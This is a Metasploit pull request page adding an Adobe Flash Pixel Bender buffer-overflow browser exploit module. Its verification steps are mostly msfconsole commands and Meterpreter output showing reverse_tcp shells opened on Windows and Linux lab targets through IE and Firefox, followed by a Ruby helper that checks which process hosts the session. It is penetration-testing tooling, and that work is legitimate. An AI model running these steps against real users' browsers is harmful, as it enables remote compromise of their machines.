
adobe_flash_pixel_bender_bof: Execution from the flash renderer / Linux & Windows 8.1 support. #5524

Merged
merged 2 commits into from Jun 15, 2015

Conversation

jvazquez-r7 (Contributor)

This PR adds modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb using the flash exploitation code, allowing native payload execution from the flash renderer process. It also adds support for:

  • Firefox (32-bit) / Adobe Flash plug-in on Windows 7 SP1.
  • Firefox (32-bit) / Adobe Flash plug-in on Windows 8.1
  • Linux Mint (32-bit) / Firefox (32-bit) / Adobe Flash plug-in.

So the old modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb is deprecated.

Verification

  • Install a Windows 7 target: Windows 7 SP1 32-bit / IE 11 / Firefox 38.0.5 / Adobe Flash 13.0.0.182 (ActiveX) and Flash 11.7.700.275 (plugin)
  • Install a Windows 8.1 target: Windows 8 SP1 (32-bit or 64-bit), Firefox 38.0.5 (32-bit) and Flash 13.0.0.182 (Plug-in)
  • Install a Linux target: Linux Mint "Rebecca" (32-bit), Firefox 33.0 and Adobe Flash Plug-in 11.2.202.350
  • Run msfconsole and use the module modules/exploits/windows/browser/adobe_flash_pixel_bender_bof
  • Run the module with the windows target and the windows/meterpreter/reverse_tcp payload
msf > use exploit/multi/browser/adobe_flash_pixel_bender_bof
msf exploit(adobe_flash_pixel_bender_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set target 0
target => 0
msf exploit(adobe_flash_pixel_bender_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_pixel_bender_bof) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_pixel_bender_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
  • Visit the page from Windows 7 SP1 / IE 11 / Adobe Flash 13.0.0.182 (ActiveX), verify that you get a session and that it lives inside the IE renderer process:
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending HTML response.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Request: /DXH2DnDPzGN5O/vkuPZR/
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Request: /DXH2DnDPzGN5O/vkuPZR/pFdIB.swf
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.131:54400) at 2015-06-11 17:37:24 -0500

msf exploit(adobe_flash_pixel_bender_bof) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2816
meterpreter > ps -S 2816


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 2816  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe


meterpreter >
  • Visit the page from Windows 7 SP1 / Firefox / Adobe Flash 11_7_700_275 (plugin), verify that you get a session and that it lives inside the Flash renderer process:
msf exploit(adobe_flash_pixel_bender_bof) > [*] Using URL: http://172.16.158.1:8080/DXH2DnDPzGN5O
[*] Server started.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending HTML response.
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Request: /DXH2DnDPzGN5O/vkuPZR/
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Request: /DXH2DnDPzGN5O/vkuPZR/VslP.swf
[*] 172.16.158.131   adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.131:54386) at 2015-06-11 17:35:51 -0500

msf exploit(adobe_flash_pixel_bender_bof) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 5100
meterpreter > ps -S 5100


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 5100  FlashPlayerPlugin_11_7_700_275.exe  x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_11_7_700_275.exe


meterpreter >
  • Visit the page from Windows 8.1 / Firefox 38.0.5 / Adobe Flash 13.0.0.182 (Plugin), verify that you get a session and that it lives inside the Flash renderer process:
msf exploit(adobe_flash_pixel_bender_bof) > [*] Using URL: http://172.16.158.1:8080/RgaeiMH
[*] Server started.
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Sending HTML response.
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Request: /RgaeiMH/vkuPZR/
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Request: /RgaeiMH/vkuPZR/oSXcJX.swf
[*] 172.16.158.134   adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.134
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.134:51768) at 2015-06-11 17:27:23 -0500

msf exploit(adobe_flash_pixel_bender_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2004
meterpreter > ps -S 2004


Process list
============

 PID   Name                              Arch  Session  User                  Path
 ---   ----                              ----  -------  ----                  ----
 2004  FlashPlayerPlugin_13_0_0_182.exe  x86   1        WIN-U7MBH836GNO\juan  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_13_0_0_182.exe


meterpreter >
  • Run the module with the linux target and the linux/x86/meterpreter/reverse_tcp payload
msf > use exploit/multi/browser/adobe_flash_pixel_bender_bof
msf exploit(adobe_flash_pixel_bender_bof) > set target 1
target => 1
msf exploit(adobe_flash_pixel_bender_bof) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_pixel_bender_bof) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_pixel_bender_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
  • Visit the page from the Linux target, verify that you get a session and that it lives inside the Flash renderer process:
msf exploit(adobe_flash_pixel_bender_bof) > [*] Using URL: http://172.16.158.1:8080/0jz9hTBKhcQ
[*] Server started.
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Gathering target information.
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Sending HTML response.
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Request: /0jz9hTBKhcQ/vkuPZR/
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Sending HTML...
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Request: /0jz9hTBKhcQ/vkuPZR/oxSXP.swf
[*] 172.16.158.133   adobe_flash_pixel_bender_bof - Sending SWF...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 172.16.158.133
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.133:58859) at 2015-06-11 17:31:34 -0500

msf exploit(adobe_flash_pixel_bender_bof) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : flash
OS           : Linux flash 3.13.0-37-generic #64-Ubuntu SMP Mon Sep 22 21:30:01 UTC 2014 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > getpid
Current pid: 16404
meterpreter > ps -S 16404


Process list
============

 PID    Name                         Arch  Session  User        Path
 ---    ----                         ----  -------  ----        ----
 16404  plugin-containe              x86   0        juan        �ELF


meterpreter >
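The verification steps above all end with the same manual check: compare the pid from `getpid` with the `ps -S <pid>` row and confirm the session is hosted by the process the target expects (iexplore.exe for the IE ActiveX control, FlashPlayerPlugin_<version>.exe for the Firefox plug-in on Windows, plugin-container on Linux). The Ruby below automates that check over the pasted Meterpreter output. It is an added example, not code from the PR or from the Metasploit project: the process-name patterns, the `parse_ps`/`session_in_expected_host?` helpers and the target keys are assumptions made here, and the sample transcripts are copied from the console output above. One caveat worth knowing: on Linux the kernel keeps a process's comm name in a 15-character field, so `ps` reports `plugin-containe`, and the pattern has to tolerate the truncation.

```ruby
# Added example (not part of the PR): confirm that a Meterpreter session
# lives in the host process expected for each adobe_flash_pixel_bender_bof
# target, using the text of `getpid` and `ps -S <pid>` as pasted above.

# Expected host process per target, per the PR description. Keys and
# regexes are assumptions of this example, not names from the module.
EXPECTED_HOSTS = {
  win_ie_activex:       /\Aiexplore\.exe\z/i,
  win_firefox_plugin:   /\AFlashPlayerPlugin_\d+(_\d+)*\.exe\z/i,
  # Linux comm names are truncated to 15 chars by the kernel, hence
  # "plugin-containe" in the ps output; accept both spellings.
  linux_firefox_plugin: /\Aplugin-containe(r)?\z/
}.freeze

# "Current pid: 2816" -> 2816 (nil if the line is missing)
def parse_getpid(text)
  m = text.match(/Current pid:\s*(\d+)/)
  m && m[1].to_i
end

# Parse the Meterpreter `ps` table into rows. Columns are sliced by the
# character offsets of the header words, so values containing spaces
# ("WIN-RNJ7NBRK9L7\Juan Vazquez", "C:\Program Files\...") stay intact.
def parse_ps(text)
  lines = text.lines.map(&:chomp)
  cols = %w[PID Name Arch Session User Path]
  hdr_i = lines.index { |l| l =~ /^\s*PID\s+Name\s+Arch\s+Session\s+User\s+Path/ }
  return [] unless hdr_i

  header = lines[hdr_i]
  offsets = cols.map { |c| header.index(c) }
  rows = []
  lines[(hdr_i + 1)..-1].each do |line|
    next if line.strip.empty? || line =~ /^\s*-{3}/ # skip the ---- rule
    row = {}
    cols.each_with_index do |c, i|
      field = offsets[i + 1] ? line[offsets[i]...offsets[i + 1]] : line[offsets[i]..-1]
      row[c.downcase.to_sym] = (field || '').strip
    end
    next unless row[:pid] =~ /\A\d+\z/
    row[:pid] = row[:pid].to_i
    rows << row
  end
  rows
end

# Which expected host (if any) a process name corresponds to.
def classify_host(name)
  EXPECTED_HOSTS.each { |key, re| return key if name =~ re }
  nil
end

# True when the pid reported by getpid is present in the ps output and its
# image name matches what `target` is supposed to be running in.
def session_in_expected_host?(target, getpid_text, ps_text)
  pid = parse_getpid(getpid_text)
  return false unless pid
  row = parse_ps(ps_text).find { |r| r[:pid] == pid }
  return false unless row
  classify_host(row[:name]) == target
end

# Sample transcripts copied from the console output above.
WIN7_IE_GETPID = "Current pid: 2816\n"
WIN7_IE_PS = <<~PS
   PID   Name                                Arch  Session  User                          Path
   ---   ----                                ----  -------  ----                          ----
   2816  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\\Juan Vazquez  C:\\Program Files\\Internet Explorer\\iexplore.exe
PS

WIN81_FF_GETPID = "Current pid: 2004\n"
WIN81_FF_PS = <<~PS
   PID   Name                              Arch  Session  User                  Path
   ---   ----                              ----  -------  ----                  ----
   2004  FlashPlayerPlugin_13_0_0_182.exe  x86   1        WIN-U7MBH836GNO\\juan  C:\\Windows\\system32\\Macromed\\Flash\\FlashPlayerPlugin_13_0_0_182.exe
PS

LINUX_FF_GETPID = "Current pid: 16404\n"
LINUX_FF_PS = <<~PS
   PID    Name                         Arch  Session  User        Path
   ---    ----                         ----  -------  ----        ----
   16404  plugin-containe              x86   0        juan        ?ELF
PS

if __FILE__ == $PROGRAM_NAME
  {
    win_ie_activex:       [WIN7_IE_GETPID, WIN7_IE_PS],
    win_firefox_plugin:   [WIN81_FF_GETPID, WIN81_FF_PS],
    linux_firefox_plugin: [LINUX_FF_GETPID, LINUX_FF_PS]
  }.each do |target, (gp, ps)|
    puts "#{target}: #{session_in_expected_host?(target, gp, ps) ? 'OK' : 'MISMATCH'}"
  end
end
```

Run it against a fresh session by pasting the two command outputs into the constants; a `MISMATCH` for the Windows Firefox target means the payload landed somewhere other than the FlashPlayerPlugin process, which is exactly the regression the PR's verification is trying to catch.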

@wchen-r7 wchen-r7 self-assigned this Jun 12, 2015
@wchen-r7 wchen-r7 merged commit 72672fc into rapid7:master Jun 15, 2015
todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Jun 18, 2015
Edited modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
first landed in rapid7#5524, adobe_flash_pixel_bender_bof in flash renderer .
Removed ASCII bullets since those rarely render correctly.

Edited modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
first landed in rapid7#5252, @espreto's module for WordPress Front-end Editor
File Upload Vuln . Fixed up some language usage, camel-cased "WordPress."
@todb-r7 todb-r7 mentioned this pull request Jun 18, 2015